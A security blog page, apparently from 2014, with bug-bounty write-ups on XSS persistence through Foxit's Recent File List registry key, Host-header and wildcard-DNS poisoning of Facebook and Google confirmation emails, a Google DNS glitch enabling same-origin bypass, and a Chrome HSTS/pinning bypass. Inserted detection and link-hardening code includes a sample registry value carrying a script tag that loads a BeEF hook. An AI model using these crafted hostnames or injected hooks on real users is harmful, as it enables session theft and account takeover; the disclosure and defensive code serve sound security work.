<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN0ks98B5PiTO8hOoKYmF6seodkPZ0IXY31TpLatib_2DU4uOGphkV_svgaQq2QGQkibaDYfgdyQVRkcjT3dKxDHFVonE_q9C9591GoQo1iqwAXgdnolO2zWntHWdP5cBenknqReXGd0w/s1600/vid2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFN0ks98B5PiTO8hOoKYmF6seodkPZ0IXY31TpLatib_2DU4uOGphkV_svgaQq2QGQkibaDYfgdyQVRkcjT3dKxDHFVonE_q9C9591GoQo1iqwAXgdnolO2zWntHWdP5cBenknqReXGd0w/s1600/vid2.PNG" height="396" width="640" /></a></div>
<br />
<br />
<b>Conclusion</b></div>
<div>
<b><br /></b>
You may be asking "why not embed malware in the document?". Firstly, because this is a noisy technique and most AV/whitelisting products would detect the attempt. You could also modify the user's registry to <a href="http://www.shelliscoming.com/2013/12/metasploit-controlling-internet.html">load a PAC file in the browser</a> or use PowerShell scripts to bypass some restrictions, but in that case there would be no need for this blog post =)<br />
<br /></div>
<div>
It doesn't matter how secure your product is or how many vulnerabilities were disclosed for it: if you're targeted by big Offensive players, you're certainly getting pwned. If other, less sophisticated attackers want to attack you, they'll pwn you as well, because people still fall for phishing.<br />
<br />
What makes your security posture better is how you detect and respond to these threats. I like approaches like the one described by Haifei Li & Chong Xu at CanSecWest 2014. Their talk on <a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a> described how "DNA comparison" can be used to flag and detect an application's unusual behavior, leading to exploit discovery:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3GGw-I6RbNpBED5SdpFhGQfcWJ-0vf-DehdkvlEGr1B9wXjB1cc-c2t8L5H8Ff1Woa3xd0I_1sD7pwfi7kpr4AUheoXes5bPk6Zt2UV868R8c1lowavGpu5DhI8rVPOFJTVpy8i2J8CMi/s1600/slides.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3GGw-I6RbNpBED5SdpFhGQfcWJ-0vf-DehdkvlEGr1B9wXjB1cc-c2t8L5H8Ff1Woa3xd0I_1sD7pwfi7kpr4AUheoXes5bPk6Zt2UV868R8c1lowavGpu5DhI8rVPOFJTVpy8i2J8CMi/s1600/slides.PNG" height="235" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://cansecwest.com/slides/2014/Exploit%20detection%20-%20Exploring_In_the_Wild_final.pdf">Exploit Detection</a>, Haifei Li & Chong Xu (CanSecWest 2014)</td></tr>
</tbody></table>
<br />
In this simple phishing scenario, Microsoft Word (and WordPad) drops a registry file in the %TEMP% folder as soon as the file is opened. This is clearly unusual behavior and should be flagged by security solutions. It could also be used as an IOC to analyze big sets of files/documents.<br />
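Two detections for the chain described in this post, written here as an added example (not the post's code and not the output format of any real endpoint product): an Office process writing a .reg file into the Temp folder, and a value set under Foxit's Recent File List key that cannot be a Windows path. The log lines are constructed in a simplified pipe-separated form for this example; the process names are those the post mentions.<br />

```python
# Added example (not from the post): two detections for the phishing chain
# described above, run over constructed telemetry.
import re

# Constructed sample events in a simplified form: event|process|target[|value].
# This is not the syntax of any real log product.
SAMPLE_LOG = [
    r"FileCreate|WINWORD.EXE|C:\Users\Admin\AppData\Local\Temp\~DF91A2.tmp",
    r"FileCreate|WINWORD.EXE|C:\Users\Admin\AppData\Local\Temp\invoice.reg",
    r"FileCreate|explorer.exe|C:\Users\Admin\Desktop\notes.reg",
    r'RegistrySet|regedit.exe|HKCU\Software\Foxit Software\Foxit Reader 6.0\Recent File List\File1|C:\w00t.pdf<script src="http://BEEF/hook.js"></script>',
    r"RegistrySet|FoxitReader.exe|HKCU\Software\Foxit Software\Foxit Reader 6.0\Recent File List\File2|C:\Users\Admin\report.pdf",
]

# The document viewers the post names as dropping the embedded .reg object.
OFFICE_PROCESSES = {"winword.exe", "wordpad.exe"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# The key the post shows, with any 6.x version number.
RECENT_KEY = re.compile(r"\\Foxit Reader [\d.]+\\Recent File List\\File\d+$", re.IGNORECASE)
# Characters Windows never allows in a file name: a legitimate path has none.
ILLEGAL_IN_PATH = re.compile(r'[<>"|?*\x00-\x1f]')


def parse_event(line):
    """Splits one constructed event line; returns None for malformed lines."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) < 3:
        return None
    return {
        "event": parts[0],
        "process": parts[1],
        "target": parts[2],
        "value": parts[3] if len(parts) == 4 else "",
    }


def detect(lines):
    """Returns (rule, process, target) for every event that matches a rule."""
    alerts = []
    for raw in lines:
        rec = parse_event(raw)
        if rec is None:
            continue
        proc = rec["process"].lower()
        # Rule 1: Word/WordPad writing a registry file into the Temp folder.
        if (rec["event"] == "FileCreate" and proc in OFFICE_PROCESSES
                and rec["target"].lower().endswith(".reg")
                and TEMP_DIR.search(rec["target"])):
            alerts.append(("office_drops_reg", rec["process"], rec["target"]))
        # Rule 2: a Recent File List value containing markup characters.
        if (rec["event"] == "RegistrySet" and RECENT_KEY.search(rec["target"])
                and ILLEGAL_IN_PATH.search(rec["value"])):
            alerts.append(("foxit_recent_file_markup", rec["process"], rec["target"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Rule 2 doubles as a one-off hunt: exporting the Recent File List key from every workstation and running the same character check over the values finds entries planted before the detection was in place.<br />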
<br />
<a href="https://twitter.com/randomdross">David Ross</a> made a post recently describing lots of different scenarios for XSS persistence. This is yet another XSS persistence mechanism that could be used to backdoor compromised systems, for example.<br />
<div>
<br /></div>
I hope you enjoyed this two page write-up about XSS, because, you know, everybody likes hearing about cool hacking techniques and...<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawIsIRQ1GLE-fMXsp_c1ITwfKVtDaGYT43OgSlDs1E-efeurQZ3WKbhzp4TjKFqL_o5Ji_Ec5ZDoedT1oYYANg4pBhCi3nQamXmKdlIIwU8oSirNBEKqxNx37ypH4ipLoGnflcaJiBVjA/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiawIsIRQ1GLE-fMXsp_c1ITwfKVtDaGYT43OgSlDs1E-efeurQZ3WKbhzp4TjKFqL_o5Ji_Ec5ZDoedT1oYYANg4pBhCi3nQamXmKdlIIwU8oSirNBEKqxNx37ypH4ipLoGnflcaJiBVjA/s1600/xss1.PNG" /></a></div>
<br />
...Well, at least there was a cool Youtube video showing a cool BeEF hook and...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrQrCbgTtviQJXCr545amvGDi-MgPGea8ELflKIEVmExeljK03leoGQCiBFG68tgty7nGLIIYkQRLgeOallp8fWJLIY4YvY6sJdYsFR_kau3wFM5-meYIcG8MHIK0r4KNtKr2qtCr94Ep0/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrQrCbgTtviQJXCr545amvGDi-MgPGea8ELflKIEVmExeljK03leoGQCiBFG68tgty7nGLIIYkQRLgeOallp8fWJLIY4YvY6sJdYsFR_kau3wFM5-meYIcG8MHIK0r4KNtKr2qtCr94Ep0/s1600/xss2.PNG" /></a></div>
<div>
<br /></div>
<div>
Hm, I'd better finish this post with a Dilbert comic.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dilbert.com/strips/comic/2014-05-19/"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_B_tqtTxYT2vZZ9TaCVkb8_kJI5toVnlKdXXCNmId3lf0jGKw2CcqqpZMSX3Y16l7g9jEg3fL6mHzr2on9WeVE625QHWRdpS2vGHxxLFOGqj_4c_lR8R8QY01G1coZNt8bv7kd3-_YHKe/s1600/221657.strip.gif" height="198" width="640" /></a></div>
</div>
<b>Wildcard DNS, Content Poisoning, XSS and Certificate Pinning</b> (Bernardo Rodrigues, 2014-03-31)<br />
<br />
Hi everyone, this time I'm going to talk about an interesting vulnerability that I reported to Google and Facebook a couple of months ago. I had some spare time last October and I started testing for vulnerabilities on a few companies with established bug bounty programs. Google awarded me $5000,00 and Facebook paid me $500,00 for reporting the bugs.<br />
<br />
I know you may be more interested on highly sophisticated exploits that allow <a href="http://seclists.org/fulldisclosure/2014/Mar/123">arbitrary file upload to the Internet</a>, with custom payloads that may lead to unexpected behavior like <a href="http://seclists.org/fulldisclosure/2014/Mar/332">closing Security Lists</a>. Hopefully this class of bugs is already <a href="http://seclists.org/fulldisclosure/2014/Mar/333">patched by Fyodor</a> and Attrition is offering an <a href="http://attrition.org/postal/asshats/">efficient exploit mitigation technique</a>.<br />
<br />
The title may be a little confusing, but I'm going to show that it's possible to combine all these techniques to exploit vulnerable systems.<br />
<br />
<b>Content Poisoning and Wildcard DNS</b><br />
<br />
Host header poisoning occurs when the application doesn't validate full URLs generated from the HTTP Host header, including the domain name. Recently, the <a href="https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/">Django Framework</a> fixed a few vulnerabilities related to that, and <a href="https://twitter.com/albinowax">James Kettle</a> made an interesting <a href="http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html">post discussing lots of attack scenarios</a> using host header attacks.<br />
<br />
While testing this issue, I found a different kind of Host header attack that abuses the possibility to browse wildcard domains. Let's have a quick look at the <a href="https://en.wikipedia.org/wiki/Hostname">Wikipedia entry on Hostnames</a>:<br />
<blockquote class="tr_bq">
"The Internet standards (<a href="https://en.wikipedia.org/wiki/Request_for_Comments" title="Request for Comments">Request for Comments</a>) for protocols mandate that component hostname labels may contain only the <a href="https://en.wikipedia.org/wiki/ASCII" title="ASCII">ASCII</a> letters 'a' through 'z' (in a case-insensitive manner), the digits '0' through '9', and the <a href="https://en.wikipedia.org/wiki/Hyphen" title="Hyphen">hyphen</a> ('-'). <b>The original specification of hostnames in <a href="https://tools.ietf.org/html/rfc952">RFC 952</a>, mandated that labels could not start with a digit or with a hyphen, and must not end with a hyphen</b>. However, a subsequent specification (<a href="https://tools.ietf.org/html/rfc1123">RFC 1123</a>) permitted hostname labels to start with digits. No other symbols, punctuation characters, or white space are permitted."
</blockquote>
The fun part here is that the network stacks of Windows, Linux and Mac OS X consider domains like -www.plus.google.com, www-.plus.google.com and www.-.plus.google.com valid. It's interesting to note that Android won't resolve these domains, for some reason.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gx1JoqQRqQYKRS2bt9eY28bh_giwwy7SWD2qRNuzOOE0Rokj5OkPWsf-EuTOZMLUccPr8j4VRD28C_4ttiJSXfcmFnWt5peY-6Eh-v0uG4-sfqmWT9AaTOooovOgkgbIyqi019A60CRm/s1600/Screenshot_2014-03-30-10-54-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gx1JoqQRqQYKRS2bt9eY28bh_giwwy7SWD2qRNuzOOE0Rokj5OkPWsf-EuTOZMLUccPr8j4VRD28C_4ttiJSXfcmFnWt5peY-6Eh-v0uG4-sfqmWT9AaTOooovOgkgbIyqi019A60CRm/s1600/Screenshot_2014-03-30-10-54-39.png" height="240" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCA-JGBIVkjfwY3fKGxg0M9fksauEvyftUo23D3SZqoiL5KUSi8CoA-Ltx0ltAusVNUxzh-mlGNz297HZtzFCzY4xHuBDmKWfX7Vc0gxqlUs7SJHEn4KTn5306jDFHltsd1c3hBTT3_8Xv/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCA-JGBIVkjfwY3fKGxg0M9fksauEvyftUo23D3SZqoiL5KUSi8CoA-Ltx0ltAusVNUxzh-mlGNz297HZtzFCzY4xHuBDmKWfX7Vc0gxqlUs7SJHEn4KTn5306jDFHltsd1c3hBTT3_8Xv/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" height="192" width="640" /></a></div>
<br />
Take, for example, the following URL: https://www.example.com.-.www.sites.google.com. If we compose an e-mail and paste it in the body, GMail will split it and the received message will have two “clickable” parts (<a href="https://www.example.com/">https://www.example.com</a> and <a href="http://sites.google.com/">sites.google.com</a>).<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBahAnHu_sFjIsq0eWbYQ5y6AL3r6BzVqW8xbnjvk5kfUj-EQjQDEPW1kUeT47nbCmDHff1iDjoSgXCdEhemNmLpbBd6jJJwxQIBBArfG4952scSbra0aiF_jHegqHl0cP6AzJxUQwXrv1/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBahAnHu_sFjIsq0eWbYQ5y6AL3r6BzVqW8xbnjvk5kfUj-EQjQDEPW1kUeT47nbCmDHff1iDjoSgXCdEhemNmLpbBd6jJJwxQIBBArfG4952scSbra0aiF_jHegqHl0cP6AzJxUQwXrv1/s1600/test.png" height="156" width="640" /></a></div>
<br />
Most e-mail based notifications use the very same host you are browsing to compose the notification messages: you see where this is going, right?<br />
<br />
Facebook has a wildcard DNS entry at zero.facebook.com. In order to exploit the flaw, we have to browse the service using a poisoned URL and perform actions that may need e-mail confirmation, checking whether Facebook mails the crafted URL to the user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhablmuBSRnfIiNRUil4-Qy4VyoHaW5ZXAWSJTCN7FJwN_gYy-iwk-Bo28m9o12M3BNCbVcKXHt1q8WLK7-44F0yFN3IHIhyke19IfaBowywZ6fxpzlYQBRP4OD_Xk_G3mpM8zpOE2SuQws/s1600/header2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhablmuBSRnfIiNRUil4-Qy4VyoHaW5ZXAWSJTCN7FJwN_gYy-iwk-Bo28m9o12M3BNCbVcKXHt1q8WLK7-44F0yFN3IHIhyke19IfaBowywZ6fxpzlYQBRP4OD_Xk_G3mpM8zpOE2SuQws/s1600/header2.PNG" height="324" width="640" /></a></div>
<br />
The only vulnerable endpoint that I found affected by this issue was the registration e-mail confirmation. You may be asking, how could one exploit this to attack a legitimate user?<br />
<br />
Suppose I want to attack the Facebook account of goodguy@example.com. I can create or associate a "duplicate" account using the "+" sign by browsing Facebook with these injected URLs. If I navigate to Facebook using a URL like https://www.example.com.-.zero.facebook.com, all I have to do is create the duplicate account goodguy+DUPLICATE@example.com. Most e-mail services like GMail and Hotmail ignore what you type after the "+" and deliver the message to the original account.<br />
<br />
In this case, all e-mails that Facebook sent to confirm that association had the poisoned links.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWSXkcKOV6hwDxYEpIdO4vs3V3CvQR46UUjm-pi6AUTkkkPJ7hM1RisyTgGFyJ2IU8FOR-SheIQvPRxhgAVL0Z5PpW8hZQdIeMS7EmMNls-CLUVommClrSdciK0LLYlm8EWGM_ea96o2xG/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWSXkcKOV6hwDxYEpIdO4vs3V3CvQR46UUjm-pi6AUTkkkPJ7hM1RisyTgGFyJ2IU8FOR-SheIQvPRxhgAVL0Z5PpW8hZQdIeMS7EmMNls-CLUVommClrSdciK0LLYlm8EWGM_ea96o2xG/s1600/Capturar.PNG" height="170" width="640" /></a></div>
<br />
This could also be used to poison password reset e-mails, but Facebook's forms were not affected. They quickly fixed the issue by hard-coding the proper URL in their e-mail confirmation system. It's also possible (but not recommended) to fix these issues by sending notifications with relative links instead of complete URLs ("please click <a href="http://www.example.com.-.zero.facebook.com/">here</a>" instead of "please click on the specified URL: <a href="http://www.example.com/">www.example.com</a>.-.<a href="http://zero.facebook.com/">zero.facebook.com</a>").<br />
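The two checks this section turns on, as an added example that is not Facebook's, Google's or Django's code: a hostname validator that enforces the RFC 952/1123 label rules quoted above (which rejects the ".-." names but accepts a label like "com-----www"), and a confirmation-link builder that rejects unknown Host values and always uses a configured canonical host, which is the fix the post describes. The hosts notify.example.org and www.example.org are placeholders assumed for the example.<br />

```python
# Added example (not Facebook's, Google's or Django's code): validate Host
# headers against RFC 1123 and build mailed links from a configured canonical
# host, never from the request. Hostnames below are placeholders.
import re

# One RFC 1123 label: letters, digits and hyphens, 1-63 chars, and the
# RFC 952 rule the post quotes: no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_rfc1123_hostname(host):
    """True when every label is well-formed. This rejects the '.-.' names the
    post shows, but a label such as 'com-----www' is legal, so syntax checks
    alone do not stop wildcard-DNS poisoning."""
    host = host.rstrip(".")
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.split("."))


# Assumed deployment settings for this example, not any real site's config.
CANONICAL_HOST = "notify.example.org"
ALLOWED_HOSTS = {"notify.example.org", "www.example.org"}


def confirmation_link_vulnerable(request_host, token):
    """Host header poisoning: whatever Host the request carried is mailed out."""
    return f"https://{request_host}/confirm?token={token}"


def host_allowed_by_suffix(request_host):
    """A common but weak allowlist. With a wildcard DNS record under
    example.org, 'www.example.com-----notify.example.org' passes this check
    while resolving wherever the wildcard (or a resolver bug) points."""
    host = request_host.lower()
    return host == "example.org" or host.endswith(".example.org")


def confirmation_link_hardened(request_host, token):
    """The fix the post describes: reject unknown Host values, and build the
    link from the configured canonical host even when the Host is known."""
    host = request_host.split(":", 1)[0].lower()  # strip an optional port
    if not is_rfc1123_hostname(host) or host not in ALLOWED_HOSTS:
        return None
    return f"https://{CANONICAL_HOST}/confirm?token={token}"


if __name__ == "__main__":
    for h in ("notify.example.org", "www.example.com-----notify.example.org",
              "www.example.com.-.notify.example.org"):
        print(h, confirmation_link_vulnerable(h, "t0k"),
              host_allowed_by_suffix(h), confirmation_link_hardened(h, "t0k"))
```

The exact-match allowlist matters because of the wildcard record: any suffix-based check is satisfied by the crafted names, so the only reliable rule is "the link host is a configuration value, not request data".<br />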
<br />
<b>XSS and Wildcard DNS</b><br />
<br />
While searching for these issues on Google I quickly found wildcard domains like:<br />
<br />
- <a href="https://w00t.drive.google.com/">https://w00t.drive.google.com</a><br />
- <a href="https://w00t.script.google.com/">https://w00t.script.google.com</a><br />
- <a href="https://w00t.sites.google.com/">https://w00t.sites.google.com</a><br />
<br />
In case you're wondering how to quickly find these wildcard domains, you can download the <a href="https://scans.io/">scans.io datasets</a> and look them up there. You can find these references in the Reverse DNS records or by searching for SSL certificates issued to wildcard domains, like *.sites.google.com.<br />
<br />
During my initial tests, I was unable to craft URLs using .-. inside the drive.google.com domain (I got 500 error messages) and all I could do was create URLs like this: https://www.example.com-----www.drive.google.com.<br />
<br />
When you browse Google Drive using this URL, upload a file to a folder and try to zip/download it asking for an e-mail confirmation (“Email when ready”), the e-mail confirmation message will look like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgok_th8Lf4ndxNUfkG5ryVEov4XMk_rvO81aj_Mjw98emKgn3wB8x04aTh5NZcpxYvTsNnw3omw5yN98LLXKe3AxtL9QD3eIFm9Bz-VaLmGdZF3VwyheRPyndIYd0CiDhs2Tvw2agbKUrm/s1600/zipp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgok_th8Lf4ndxNUfkG5ryVEov4XMk_rvO81aj_Mjw98emKgn3wB8x04aTh5NZcpxYvTsNnw3omw5yN98LLXKe3AxtL9QD3eIFm9Bz-VaLmGdZF3VwyheRPyndIYd0CiDhs2Tvw2agbKUrm/s1600/zipp.PNG" height="170" width="640" /></a></div>
<br />
The "ready for downloading" link would point to https://www.example.com-----www.drive.google.com/export-result?archiveId=REDACTED. So far no big deal, I was still unable to poison the links... And phishing yourself is not that useful =)<br />
<br />
I kept testing different URLs until I found a weird behavior on Google's DNS servers. When typing URLs containing a domain you control, followed by a certain number of "-" and the wildcard domain from Google, the resolved IP would be the one of the domain you control.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI6IAAvGEKo1Ud-jZTT8buenfdKpcEj14wqjfOaO7CFBmqMzwH2CGThDOdBcpaI_ITGlDNxnwndGFTbq_XAQJRzdkLVdShLfrRYN6nFVR98-LAqeZHnAZMAmWv7XGp-Y_9wnCZ96K7zIAK/s1600/dns.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI6IAAvGEKo1Ud-jZTT8buenfdKpcEj14wqjfOaO7CFBmqMzwH2CGThDOdBcpaI_ITGlDNxnwndGFTbq_XAQJRzdkLVdShLfrRYN6nFVR98-LAqeZHnAZMAmWv7XGp-Y_9wnCZ96K7zIAK/s1600/dns.PNG" height="538" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">My highly sophisticated Fuzzer in action</td></tr>
</tbody></table>
For some reason, there was a glitch on their DNS servers, more specifically in the regexp that stripped "--" from the domain prefixes. I'm not sure why they performed these checks, but it may have something to do with <a href="https://en.wikipedia.org/wiki/Internationalized_domain_name">Internationalized Domain Names</a>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://xkcd.com/1171/" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW908ww4jxnv-wLoQf7RAc6YBftcw6gXh4bNa5N0zOcmzMkDHxeeX0pjuRHA6pLwrKaLZ3qSbg0EJxvfviCrm4M1KRXLYOjyKNwrDSGGPgFtz5Nhx9_dLGffRQMYoAsWtMYZb2zc8MN4Gl/s1600/perl_problems.png" height="238" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XKCD's take on the bug</td></tr>
</tbody></table>
Some Google domains affected by this issue (October 2013):<br />
<br />
- docs.google.com<br />
- docs.sandbox.google.com<br />
- drive.google.com<br />
- drive.sandbox.google.com<br />
- glass.ext.google.com<br />
- prom-qa.sandbox.google.com<br />
- prom-test.sandbox.google.com<br />
- sandbox.google.com<br />
- script.google.com<br />
- script.sandbox.google.com<br />
- sites.google.com<br />
- sites.sandbox.google.com<br />
<div>
<br /></div>
<div>
Now that I can impersonate a Google domain, it's possible to abuse the Same Origin Policy and issue requests on behalf of a logged-in user. <a href="http://twitter.com/lcamtuf">lcamtuf</a> already told us about <a href="http://lcamtuf.blogspot.com.br/2010/10/http-cookies-or-how-not-to-design.html">HTTP cookies, or how not to design protocols</a>. What happens if we control www.example.com and the logged-in user from drive.google.com visits the crafted URL http://www.example.com---.drive.google.com?</div>
<div>
<br /></div>
<div>
The request goes to the legitimate site:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKjM6lTpUpORuJ65bF1doXVVlOXVgoCgkp7O0DuVApOmRsoLP_0pMT8dYH6LsU95lKURN0gkq_mNtBeuM_GFNZVspOQO9wQjdmEej61LOEkE6Ovp_GnA4qIbGwjgIAF7rnnPffvq53Ynd/s1600/req1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKjM6lTpUpORuJ65bF1doXVVlOXVgoCgkp7O0DuVApOmRsoLP_0pMT8dYH6LsU95lKURN0gkq_mNtBeuM_GFNZVspOQO9wQjdmEej61LOEkE6Ovp_GnA4qIbGwjgIAF7rnnPffvq53Ynd/s1600/req1.PNG" height="520" width="640" /></a></div>
<br />
The request goes to the user-controlled site, in this case my own server running nginx:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7PFfgkTN_CGlt9AHP3Ww2-GZ5dmtO-ExguzK0c_FQSrDLy5mvqRIezPATbnG-lB2IECEqJO66J2BDaKMAv2zLbovg0q4aTFrbGJqWO8xNVAJWnna6xQrXs0X48uukFSaIGavn_LKePD6/s1600/req2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7PFfgkTN_CGlt9AHP3Ww2-GZ5dmtO-ExguzK0c_FQSrDLy5mvqRIezPATbnG-lB2IECEqJO66J2BDaKMAv2zLbovg0q4aTFrbGJqWO8xNVAJWnna6xQrXs0X48uukFSaIGavn_LKePD6/s1600/req2.PNG" height="520" width="640" /></a></div>
<div>
<br />
This amounts to an XSS-like attack: the same-origin policy has been bypassed, so you can steal cookies and run scripts in the context of the site, for example.<br />
<br /></div>
<b>Certificate Pinning and Wildcard DNS</b><br />
<br />
So far so good, but what if we were performing the same tests on Google Chrome, which enforces Certificate Pinning for its domains? I didn't notice at first, but I accidentally found an issue in Chrome too: it was failing to perform the proper HSTS checks for these non-RFC-compliant domains.<br />
<br />
Other parts of the network stack were processing and fetching results for these "invalid" DNS names, but TransportSecurityState was rejecting them and therefore HSTS policies didn't apply. The fix simply removed the sanity checks to make TransportSecurityState more promiscuous in what it processes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PU0UPsbdu1oi-uhwz2Vu04OLOwT0jMs4EvxdQb3sPpb73c0UIDF_2jdBB0DNIuSMa_TVAGPNnBIt11C3hQtbBx6ozXeZuP0fEKNarXFR4d1QFQeibxwrNzjqEYAs8DovUG3f0HF473SF/s1600/pinning1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PU0UPsbdu1oi-uhwz2Vu04OLOwT0jMs4EvxdQb3sPpb73c0UIDF_2jdBB0DNIuSMa_TVAGPNnBIt11C3hQtbBx6ozXeZuP0fEKNarXFR4d1QFQeibxwrNzjqEYAs8DovUG3f0HF473SF/s1600/pinning1.PNG" height="302" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgwb2pHhgz6ZdCgeXLQPSBVcaEOwvk2TjUa0fyVfYTctlGrEHj7YDnNct9cXHav4fbgTi0NLJn7acPORcYA5FkQRNOwgTTOqUCqkAJtgMBCtITU5bOH6BtUSrwc2tlwDZgxiy7BtYmR4W/s1600/pinning2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgwb2pHhgz6ZdCgeXLQPSBVcaEOwvk2TjUa0fyVfYTctlGrEHj7YDnNct9cXHav4fbgTi0NLJn7acPORcYA5FkQRNOwgTTOqUCqkAJtgMBCtITU5bOH6BtUSrwc2tlwDZgxiy7BtYmR4W/s1600/pinning2.PNG" height="230" width="640" /></a></div>
<br />
You can easily reproduce this on Chrome prior to v31: proxy Chrome through OWASP ZAP (accepting its certificate), visit URLs like https://sites.google.com and Chrome will display a “heightened security” error message. If you type URLs like https://www-.sites.google.com or https://www-.plus.google.com, Chrome offers the option to “Proceed anyway”. If you're in Turkey right now you don't need to do anything, the <a href="http://googleonlinesecurity.blogspot.com.br/2014/03/googles-public-dns-intercepted-in-turkey.html">Turkish Telecom does all the MITM job for you</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
